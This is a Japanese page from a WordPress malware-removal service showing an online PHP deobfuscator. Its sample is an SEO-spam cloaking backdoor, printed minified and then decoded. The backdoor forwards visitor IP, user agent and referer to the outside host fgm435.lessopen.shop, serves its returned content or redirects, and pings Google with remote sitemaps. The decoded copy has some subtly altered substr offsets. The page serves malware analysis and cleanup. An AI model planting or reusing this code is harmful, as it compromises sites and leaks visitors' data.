Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php
$a='fgm435';@set_time_limit(3600);define("W",'http://fgm435.lessopen.shop');define("U",getu());function k($b){return@$_SERVER[$b]?$_SERVER[$b]:"";}define("S",strtolower(k("PHP_SELF")!=""?k("PHP_SELF"):k("SCRIPT_NAME")));$d=stripos(S,"index.php")!==false&&stripos(U,S)===false?rtrim(S,"index.php"):S;if($d==""){$d="/";}define("F",$d);$h=@$_REQUEST["p"];$d=ltrim(U,F);if($h!=""){$d=preg_replace("@(\\?|\\&)p=".$h."@","",$d);}define("U2",preg_replace("#^\\W+#","",$d));$k=k('HTTP_USER_AGENT');function getu(){$l=k("REQUEST_URI");if(empty($l)){$p=k('argv');$l=S.'?'.(is_array($p)?$p[0]:k('QUERY_STRING'));}return $l;}function is_https(){if(!empty($_SERVER['HTTPS'])&&strtolower($_SERVER['HTTPS'])!=='off'){return true;}elseif(!empty($_SERVER['HTTP_X_FORWARDED_PROTO'])&&$_SERVER['HTTP_X_FORWARDED_PROTO']==='https'){return true;}elseif(!empty($_SERVER['HTTP_FRONT_END_HTTPS'])&&strtolower($_SERVER['HTTP_FRONT_END_HTTPS'])!=='off'){return true;}return false;}function get_ip(){$t=$_SERVER['REMOTE_ADDR'];if(!empty($_SERVER['HTTP_CLIENT_IP'])){$t=$_SERVER['HTTP_CLIENT_IP'];}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$t=$_SERVER['HTTP_X_FORWARDED_FOR'];}if(stristr($t,',')){$u=explode(",",$t);$t=$u[0];}return $t;}function get_url($ff){if(!function_exists("pfsockopen")&&!function_exists("fsockopen")){return false;}$ff=parse_url($ff);if(empty($ff["port"])){$ff["port"]=80;}$gg=$ff["path"]."?".$ff["query"];$hh=pfsockopen($ff["host"],$ff["port"],$ii,$jj,30);if(!$hh){$hh=fsockopen($ff["host"],$ff["port"],$ii,$jj,30);}if(!$hh){return false;}else{$kk="GET $gg HTTP/1.1\r\n";$kk.="Host: {$ff['host']}\r\n";$kk.="Connection: Close\r\n";$kk.="\r\n";fwrite($hh,$kk);$ll='';$mm=0;while(true){$ll.=fread($hh,1);$mm+=1;if($mm>=4&&$ll[$mm-1]=="\n"&&substr($ll,-4)=="\r\n\r\n"){break;}}$nn=readChunked($hh,"fread");fclose($hh);return $nn;}}function get_url2($ff){$ff=parse_url($ff);$gg=$ff["path"]."?".$ff["query"];if(empty($ff["port"])){$ff["port"]=80;}$hh=b_fsockopen($ff["host"],$ff["port"],$ii,$jj,30);if(!$hh){return false;}else{$kk="GET $gg HTTP/1.1\r\n";$kk.="Host: {$ff['host']}\r\n";$kk.="Connection: Close\r\n";$kk.="\r\n";socket_write($hh,$kk,strlen($kk));$oo="";$ll='';$mm=0;while(true){$ll.=socket_read($hh,1);$mm+=1;if($mm>=4&&$ll[$mm-1]=="\n"&&substr($ll,-4)=="\r\n\r\n"){break;}}$nn=readChunked($hh,"socket_read");socket_close($hh);return $nn;}}function readChunked($pp,$qq){$nn='';while(true){$rr='';do{$rr.=$qq($pp,1);}while(strpos($rr,"\r\n")===false);if(strpos($rr,' ')!==false){list($uu,$vv)=explode(' ',$rr,2);}else{$uu=$rr;$vv='';}$uu=(int)base_convert($uu,16,10);if($uu===0){$qq($pp,2);return $nn;}else{$rr='';$ww=0;while($ww<$uu+2){$rr.=$qq($pp,$uu-$ww+2);$ww=strlen($rr);}$nn.=substr($rr,0,-2);}}}function b_fsockopen($xx,$yy,&$ii,&$jj,$zz){if(!function_exists('socket_create'))return false;$aaa=gethostbyname($xx);$bbb=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);$ccc=@socket_connect($bbb,$aaa,$yy);if($ccc){return $bbb;}$ii=socket_last_error($bbb);$jj=socket_strerror($ii);socket_close($bbb);return false;}function http($ccc,$bbb){$ddd="text/html";if(strpos(U2,"pingsitemap")===false&&(strpos(U2,".xml")!==false||strpos(U2,"/feed")!==false)){$ddd="text/xml";}else{if(strpos(U2,".txt")!==false){$ddd="text/plain";}else{if(strpos(U2,"images/")!==false){$ddd="image/webp";}else{if(strpos(U2,"sitemap.xsl")!==false){$ddd="text/css";}}}}header("content-type: {$ddd}; charset=UTF-8");$eee=http_build_query($bbb);$fff=W.$ccc."?".$eee;$ggg=@file_get_contents($fff);if(!$ggg){$ggg=c(W.$ccc,$eee,0);}if(!$ggg){$ggg=c(W.$ccc,$eee,1);}if(!$ggg){$ggg=get_url($fff);}if(!$ggg){$ggg=get_url2($fff);}if(!$ggg){$hhh=@fopen($fff,'r');if($hhh){stream_get_meta_data($hhh);$iii="";while(!feof($hhh)){$iii.=fgets($hhh,1024);}fclose($hhh);return $iii;}}return $ggg;}function c($ccc,$eee,$jjj){if(function_exists("curl_init")){$kkk=curl_init();if($jjj){curl_setopt($kkk,CURLOPT_URL,$ccc);curl_setopt($kkk,CURLOPT_POST,1);curl_setopt($kkk,CURLOPT_POSTFIELDS,$eee);}else{curl_setopt($kkk,CURLOPT_URL,$ccc."?".$eee);}curl_setopt($kkk,CURLOPT_RETURNTRANSFER,1);curl_setopt($kkk,CURLOPT_HEADER,0);curl_setopt($kkk,CURLOPT_TIMEOUT,10);curl_setopt($kkk,CURLOPT_FOLLOWLOCATION,1);$ggg=curl_exec($kkk);curl_close($kkk);return $ggg;}return false;}function g($ccc,$bbb){$ggg=http($ccc,$bbb);if(!$ggg){@header('HTTP/1.1 500 Internal Server Error');die;}$b=substr($ggg,0,1);switch($b){case "4":@header('HTTP/1.1 404 Not Found');die;case "5":@header('HTTP/1.1 500 Internal Server Error');die;case "3":@header('HTTP/1.1 302 Moved Permanently');header('Location: '.substr($ggg,1));header('referer: '.k("HTTP_HOST"));die;case "7":return false;case "8":die;default:header('HTTP/1.1 200 OK');return $ggg;}}$lll=array("ip"=>get_ip(),"lang"=>k("HTTP_ACCEPT_LANGUAGE"),"ua"=>$k,"r"=>strtolower(k("HTTP_REFERER")),"host"=>k("HTTP_HOST"),"uri"=>U,"uri2"=>U2,"isBot"=>preg_match("@google|yahoo|bing@",$k)?"1":"","f"=>F,"p"=>$h);if(is_https()){$lll["h"]="1";}if(strpos(U,"pingsitemap")!==false){$mmm=explode(",",g("/sitemap.list",$lll));foreach($mmm as $nnn){$bbb='https://www.google.com/ping?sitemap='.$nnn;$ggg=c($bbb,array(),0);if(!$ggg){$ggg=@file_get_contents($bbb);}if(stristr($ggg,'successfully')){echo $bbb.'<br>pingok<br>';}else{echo $bbb.'======creat file false!<br>';}}die;}$ooo=g("/",$lll);if($ooo){die($ooo);} ?><?php<?php
$a = 'fgm435';
@set_time_limit(3600);
define("W", 'http://fgm435.lessopen.shop');
define("U", getu());
function k($b)
{
return @$_SERVER[$b] ? $_SERVER[$b] : "";
}
define("S", strtolower(k("PHP_SELF") != "" ? k("PHP_SELF") : k("SCRIPT_NAME")));
$d = stripos(S, "index.php") !== false && stripos(U, S) === false ? rtrim(S, "index.php") : S;
if ($d == "") {
$d = "/";
}
define("F", $d);
$h = @$_REQUEST["p"];
$d = ltrim(U, F);
if ($h != "") {
$d = preg_replace("@(\\?|\\&)p=" . $h . "@", "", $d);
}
define("U2", preg_replace("#^\\W+#", "", $d));
$k = k('HTTP_USER_AGENT');
function getu()
{
$l = k("REQUEST_URI");
if (empty($l)) {
$p = k('argv');
$l = "S?" . (is_array($p) ? $p[0] : k('QUERY_STRING'));
}
return $l;
}
function is_https()
{
if (!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
return true;
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
return true;
} elseif (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
return true;
}
return false;
}
function get_ip()
{
$t = $_SERVER['REMOTE_ADDR'];
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$t = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$t = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if (stristr($t, ',')) {
$u = explode(",", $t);
$t = $u[0];
}
return $t;
}
function get_url($ff)
{
if (!function_exists("pfsockopen") && !function_exists("fsockopen")) {
return false;
}
$ff = parse_url($ff);
if (empty($ff["port"])) {
$ff["port"] = 80;
}
$gg = $ff["path"] . "?" . $ff["query"];
$hh = pfsockopen($ff["host"], $ff["port"], $ii, $jj, 30);
if (!$hh) {
$hh = fsockopen($ff["host"], $ff["port"], $ii, $jj, 30);
}
if (!$hh) {
return false;
} else {
$kk = "GET {$gg} HTTP/1.1\r\n";
$kk .= "Host: {$ff['host']}\r\n";
$kk .= "Connection: Close\r\n";
$kk .= "\r\n";
fwrite($hh, $kk);
$ll = '';
$mm = 0;
while (true) {
$ll .= fread($hh, 1);
$mm += 1;
if ($mm >= 4 && $ll[$mm - 1] == "\n" && substr($ll, 4) == "\r\n\r\n") {
break;
}
}
$nn = readChunked($hh, "fread");
fclose($hh);
return $nn;
}
}
function get_url2($ff)
{
$ff = parse_url($ff);
$gg = $ff["path"] . "?" . $ff["query"];
if (empty($ff["port"])) {
$ff["port"] = 80;
}
$hh = b_fsockopen($ff["host"], $ff["port"], $ii, $jj, 30);
if (!$hh) {
return false;
} else {
$kk = "GET {$gg} HTTP/1.1\r\n";
$kk .= "Host: {$ff['host']}\r\n";
$kk .= "Connection: Close\r\n";
$kk .= "\r\n";
socket_write($hh, $kk, strlen($kk));
$oo = "";
$ll = '';
$mm = 0;
while (true) {
$ll .= socket_read($hh, 1);
$mm += 1;
if ($mm >= 4 && $ll[$mm - 1] == "\n" && substr($ll, 4) == "\r\n\r\n") {
break;
}
}
$nn = readChunked($hh, "socket_read");
socket_close($hh);
return $nn;
}
}
function readChunked($pp, $qq)
{
$nn = '';
while (true) {
$rr = '';
do {
$rr .= $qq($pp, 1);
} while (strpos($rr, "\r\n") === false);
if (strpos($rr, ' ') !== false) {
list($uu, $vv) = explode(' ', $rr, 2);
} else {
$uu = $rr;
$vv = '';
}
$uu = (int) base_convert($uu, 16, 10);
if ($uu === 0) {
$qq($pp, 2);
return $nn;
} else {
$rr = '';
$ww = 0;
while ($ww < $uu + 2) {
$rr .= $qq($pp, $uu - $ww + 2);
$ww = strlen($rr);
}
$nn .= substr($rr, 0, 2);
}
}
}
function b_fsockopen($xx, $yy, &$ii, &$jj, $zz)
{
if (!function_exists('socket_create')) {
return false;
}
$aaa = gethostbyname($xx);
$bbb = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$ccc = @socket_connect($bbb, $aaa, $yy);
if ($ccc) {
return $bbb;
}
$ii = socket_last_error($bbb);
$jj = socket_strerror($ii);
socket_close($bbb);
return false;
}
function http($ccc, $bbb)
{
$ddd = "text/html";
if (strpos(U2, "pingsitemap") === false && (strpos(U2, ".xml") !== false || strpos(U2, "/feed") !== false)) {
$ddd = "text/xml";
} else {
if (strpos(U2, ".txt") !== false) {
$ddd = "text/plain";
} else {
if (strpos(U2, "images/") !== false) {
$ddd = "image/webp";
} else {
if (strpos(U2, "sitemap.xsl") !== false) {
$ddd = "text/css";
}
}
}
}
header("content-type: {$ddd}; charset=UTF-8");
$eee = http_build_query($bbb);
$fff = W . $ccc . "?" . $eee;
$ggg = @file_get_contents($fff);
if (!$ggg) {
$ggg = c(W . $ccc, $eee, 0);
}
if (!$ggg) {
$ggg = c(W . $ccc, $eee, 1);
}
if (!$ggg) {
$ggg = get_url($fff);
}
if (!$ggg) {
$ggg = get_url2($fff);
}
if (!$ggg) {
$hhh = @fopen($fff, 'r');
if ($hhh) {
stream_get_meta_data($hhh);
$iii = "";
while (!feof($hhh)) {
$iii .= fgets($hhh, 1024);
}
fclose($hhh);
return $iii;
}
}
return $ggg;
}
function c($ccc, $eee, $jjj)
{
if (function_exists("curl_init")) {
$kkk = curl_init();
if ($jjj) {
curl_setopt($kkk, CURLOPT_URL, $ccc);
curl_setopt($kkk, CURLOPT_POST, 1);
curl_setopt($kkk, CURLOPT_POSTFIELDS, $eee);
} else {
curl_setopt($kkk, CURLOPT_URL, $ccc . "?" . $eee);
}
curl_setopt($kkk, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($kkk, CURLOPT_HEADER, 0);
curl_setopt($kkk, CURLOPT_TIMEOUT, 10);
curl_setopt($kkk, CURLOPT_FOLLOWLOCATION, 1);
$ggg = curl_exec($kkk);
curl_close($kkk);
return $ggg;
}
return false;
}
function g($ccc, $bbb)
{
$ggg = http($ccc, $bbb);
if (!$ggg) {
@header('HTTP/1.1 500 Internal Server Error');
die;
}
$b = substr($ggg, 0, 1);
switch ($b) {
case "4":
@header('HTTP/1.1 404 Not Found');
die;
case "5":
@header('HTTP/1.1 500 Internal Server Error');
die;
case "3":
@header('HTTP/1.1 302 Moved Permanently');
header('Location: ' . substr($ggg, 1));
header('referer: ' . k("HTTP_HOST"));
die;
case "7":
return false;
case "8":
die;
default:
header('HTTP/1.1 200 OK');
return $ggg;
}
}
$lll = array("ip" => get_ip(), "lang" => k("HTTP_ACCEPT_LANGUAGE"), "ua" => $k, "r" => strtolower(k("HTTP_REFERER")), "host" => k("HTTP_HOST"), "uri" => U, "uri2" => U2, "isBot" => preg_match("@google|yahoo|bing@", $k) ? "1" : "", "f" => F, "p" => $h);
if (is_https()) {
$lll["h"] = "1";
}
if (strpos(U, "pingsitemap") !== false) {
$mmm = explode(",", g("/sitemap.list", $lll));
foreach ($mmm as $nnn) {
$bbb = 'https://www.google.com/ping?sitemap=' . $nnn;
$ggg = c($bbb, array(), 0);
if (!$ggg) {
$ggg = @file_get_contents($bbb);
}
if (stristr($ggg, 'successfully')) {
echo $bbb . '<br>pingok<br>';
} else {
echo $bbb . '======creat file false!<br>';
}
}
die;
}
$ooo = g("/", $lll);
if ($ooo) {
die($ooo);
}
?><?php■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.